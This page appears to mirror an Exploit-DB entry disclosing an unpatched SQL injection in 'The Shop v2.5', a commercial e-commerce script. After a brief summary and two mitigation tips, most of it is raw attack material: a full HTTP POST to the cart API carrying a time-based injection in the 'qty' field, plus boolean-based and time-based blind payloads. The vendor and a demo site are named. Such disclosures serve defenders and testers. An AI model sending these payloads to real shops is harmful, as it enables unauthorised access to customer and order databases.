header-logo
Suggest Exploit
vendor:
The Shop
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: The Shop
Affected Version From: The Shop v2.5
Affected Version To: The Shop v2.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux
2023

The Shop v2.5 – SQL Injection

The Shop v2.5 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by manipulating the 'qty' parameter in a POST request. The payload can be injected to execute arbitrary SQL queries.

Mitigation:

1. Sanitize and validate user input before using it in SQL queries. 2. Implement prepared statements or parameterized queries to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: The Shop v2.5 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/the-shop/34858541
# Demo Site: https://shop.activeitzone.com
# Tested on: Kali Linux
# CVE: N/A


### Request ###

POST /api/v1/carts/add HTTP/1.1
Content-Type: application/json
Accept: application/json, text/plain, */*
x-requested-with: XMLHttpRequest
x-xsrf-token: xjwxipuDENxaHWGfda1nUZbX1R155JZfHD5ab8L4
Referer: https://localhost
Cookie: XSRF-TOKEN=LBhB7u7sgRN4hB3DB3NSgOBMLE2tGDIYWItEeJGL;
the_shop_session=iGQJNeNlvRFGYZvsVowWUMDJ8nRL2xzPRXhT93h7
Content-Length: 81
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

{"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0)","temp_user_id":null}


### Parameter & Payloads ###

Parameter: JSON qty ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: {"variation_id":"119","qty":"(SELECT (CASE WHEN (4420=4420)
THEN 'if(now()=sysdate(),sleep(6),0)' ELSE (SELECT 3816 UNION SELECT 4495)
END))","temp_user_id":null}

    Type: time-based blind
    Title: MySQL > 5.0.12 OR time-based blind (heavy query)
    Payload: {"variation_id":"119","qty":"if(now()=sysdate(),sleep(6),0) OR
2614=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A,
INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS
C)","temp_user_id":null}

Navigation

Suggest Exploit

Services By CQR